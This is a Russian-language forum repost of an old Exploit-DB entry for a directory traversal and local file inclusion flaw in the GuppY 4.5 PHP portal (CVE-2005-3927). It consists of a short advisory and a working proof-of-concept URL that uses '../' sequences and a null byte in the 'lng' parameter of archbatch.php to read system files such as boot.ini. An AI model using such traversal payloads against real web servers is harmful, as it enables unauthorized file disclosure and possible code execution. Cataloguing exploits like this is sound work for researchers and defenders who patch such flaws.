Exploit GuppY 4.5 - 'archbatch.php?lng' Traversal Arbitrary File Access

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
26640
Проверка EDB
  1. Пройдено
Автор
[email protected]
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2005-3927
Дата публикации
2005-11-28
Код:
source: https://www.securityfocus.com/bid/15610/info
 
GuppY is affected by multiple local file include and information disclosure vulnerabilities.
 
An attacker may leverage these issues to execute arbitrary server-side script code that resides on an affected computer with the privileges of the Web server process. This may potentially facilitate unauthorized access.
 
It should be noted that these issues may also be leveraged to read arbitrary files on an affected computer with the privileges of the Web server. An attacker can employ directory traversal sequences and NULL characters to disclose arbitrary files.
 
GuppY 4.5.9 and prior versions are vulnerable. 

http://www.example.com/[path_to_guppy]/admin/inc/archbatch.php?lng=../../../../../../../../../../../boot.ini%00
 
Источник
www.exploit-db.com

Похожие темы